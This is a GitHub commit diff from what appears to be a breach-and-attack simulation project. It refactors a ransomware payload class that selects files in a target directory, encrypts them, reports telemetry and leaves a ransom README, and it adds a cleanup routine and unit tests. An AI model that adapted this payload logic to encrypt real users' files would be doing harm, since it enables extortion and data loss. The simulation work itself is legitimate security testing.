Merge pull request #1634 from guardicore/1610-cleanup-ransomware

Cleanup function for ransomware
This commit is contained in:
Mike Salvatore 2021-11-30 12:31:04 -05:00 committed by GitHub
commit e76915cf96
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 91 additions and 30 deletions

View File

@ -26,8 +26,14 @@ class RansomwarePayload:
self._leave_readme = leave_readme self._leave_readme = leave_readme
self._telemetry_messenger = telemetry_messenger self._telemetry_messenger = telemetry_messenger
self._target_directory = self._config.target_directory
self._readme_file_path = (
self._target_directory / README_FILE_NAME if self._target_directory else None
)
self._readme_incomplete = False
def run_payload(self): def run_payload(self):
if not self._config.target_directory: if not self._target_directory:
return return
logger.info("Running ransomware payload") logger.info("Running ransomware payload")
@ -37,14 +43,14 @@ class RansomwarePayload:
self._encrypt_files(file_list) self._encrypt_files(file_list)
if self._config.readme_enabled: if self._config.readme_enabled:
self._leave_readme(README_SRC, self._config.target_directory / README_FILE_NAME) self._leave_readme_in_target_directory()
def _find_files(self) -> List[Path]: def _find_files(self) -> List[Path]:
logger.info(f"Collecting files in {self._config.target_directory}") logger.info(f"Collecting files in {self._target_directory}")
return sorted(self._select_files(self._config.target_directory)) return sorted(self._select_files(self._target_directory))
def _encrypt_files(self, file_list: List[Path]): def _encrypt_files(self, file_list: List[Path]):
logger.info(f"Encrypting files in {self._config.target_directory}") logger.info(f"Encrypting files in {self._target_directory}")
for filepath in file_list: for filepath in file_list:
try: try:
@ -58,3 +64,29 @@ class RansomwarePayload:
def _send_telemetry(self, filepath: Path, success: bool, error: str): def _send_telemetry(self, filepath: Path, success: bool, error: str):
encryption_attempt = FileEncryptionTelem(str(filepath), success, error) encryption_attempt = FileEncryptionTelem(str(filepath), success, error)
self._telemetry_messenger.send_telemetry(encryption_attempt) self._telemetry_messenger.send_telemetry(encryption_attempt)
def _leave_readme_in_target_directory(self):
try:
self._readme_incomplete = True
self._leave_readme(README_SRC, self._readme_file_path)
self._readme_incomplete = False
except Exception as ex:
logger.warning(f"An error occurred while attempting to leave a README.txt file: {ex}")
def cleanup(self):
# This cleanup function is only concerned with cleaning up and replacing *incomplete*
# README.txt files; its goal is not to ensure the existence of a README file. Therefore,
# only retry if a README.txt file actually exists.
if self._readme_incomplete and self._readme_file_path.exists():
logger.info(
"The process of leaving a README.txt was interrupted. Removing the corrupt file "
"and trying again."
)
try:
self._readme_file_path.unlink()
self._leave_readme_in_target_directory()
except Exception as ex:
logger.error(
"An error occurred while trying to remove the corrupt or incomplete README.txt "
f"file: {ex}"
)

View File

@ -10,13 +10,5 @@ def leave_readme(src: Path, dest: Path):
logger.warning(f"{dest} already exists, not leaving a new README.txt") logger.warning(f"{dest} already exists, not leaving a new README.txt")
return return
_copy_readme_file(src, dest)
def _copy_readme_file(src: Path, dest: Path):
logger.info(f"Leaving a ransomware README file at {dest}") logger.info(f"Leaving a ransomware README file at {dest}")
shutil.copyfile(src, dest)
try:
shutil.copyfile(src, dest)
except Exception as ex:
logger.warning(f"An error occurred while attempting to leave a README.txt file: {ex}")

View File

@ -1,4 +1,4 @@
from pathlib import PurePosixPath from pathlib import Path, PurePosixPath
from unittest.mock import MagicMock from unittest.mock import MagicMock
import pytest import pytest
@ -21,12 +21,17 @@ def ransomware_payload(build_ransomware_payload, ransomware_payload_config):
def build_ransomware_payload( def build_ransomware_payload(
mock_file_encryptor, mock_file_selector, mock_leave_readme, telemetry_messenger_spy mock_file_encryptor, mock_file_selector, mock_leave_readme, telemetry_messenger_spy
): ):
def inner(config): def inner(
config,
file_encryptor=mock_file_encryptor,
file_selector=mock_file_selector,
leave_readme=mock_leave_readme,
):
return RansomwarePayload( return RansomwarePayload(
config, config,
mock_file_encryptor, file_encryptor,
mock_file_selector, file_selector,
mock_leave_readme, leave_readme,
telemetry_messenger_spy, telemetry_messenger_spy,
) )
@ -121,19 +126,15 @@ def test_telemetry_success(ransomware_payload, telemetry_messenger_spy):
def test_telemetry_failure( def test_telemetry_failure(
monkeypatch, ransomware_payload_config, mock_leave_readme, telemetry_messenger_spy build_ransomware_payload, ransomware_payload_config, telemetry_messenger_spy
): ):
file_not_exists = "/file/not/exist" file_not_exists = "/file/not/exist"
ransomware_payload = RansomwarePayload( mfe = MagicMock(
ransomware_payload_config, side_effect=FileNotFoundError(f"[Errno 2] No such file or directory: '{file_not_exists}'")
MagicMock( )
side_effect=FileNotFoundError( mfs = MagicMock(return_value=[PurePosixPath(file_not_exists)])
f"[Errno 2] No such file or directory: '{file_not_exists}'" ransomware_payload = build_ransomware_payload(
) config=ransomware_payload_config, file_encryptor=mfe, file_selector=mfs
),
MagicMock(return_value=[PurePosixPath(file_not_exists)]),
mock_leave_readme,
telemetry_messenger_spy,
) )
ransomware_payload.run_payload() ransomware_payload.run_payload()
@ -172,3 +173,39 @@ def test_no_readme_if_no_directory(
ransomware_payload.run_payload() ransomware_payload.run_payload()
mock_leave_readme.assert_not_called() mock_leave_readme.assert_not_called()
def test_leave_readme_exceptions_handled(build_ransomware_payload, ransomware_payload_config):
leave_readme = MagicMock(side_effect=Exception("Test exception when leaving README"))
ransomware_payload_config.readme_enabled = True
ransomware_payload = build_ransomware_payload(
config=ransomware_payload_config, leave_readme=leave_readme
)
# Test will fail if exception is raised and not handled
ransomware_payload.run_payload()
ransomware_payload.cleanup()
def test_cleanup_incomplete_readme(build_ransomware_payload, ransomware_payload_config):
def leave_readme(_: Path, dest: Path):
if leave_readme.i == 0:
dest.touch()
leave_readme.i += 1
raise Exception("Test exception when leaving README")
leave_readme.i = 0
ransomware_payload_config.readme_enabled = True
ransomware_payload = build_ransomware_payload(
config=ransomware_payload_config, leave_readme=leave_readme
)
ransomware_payload.run_payload()
assert (ransomware_payload_config.target_directory / README_FILE_NAME).exists()
ransomware_payload.cleanup()
assert not (ransomware_payload_config.target_directory / README_FILE_NAME).exists()
assert leave_readme.i == 2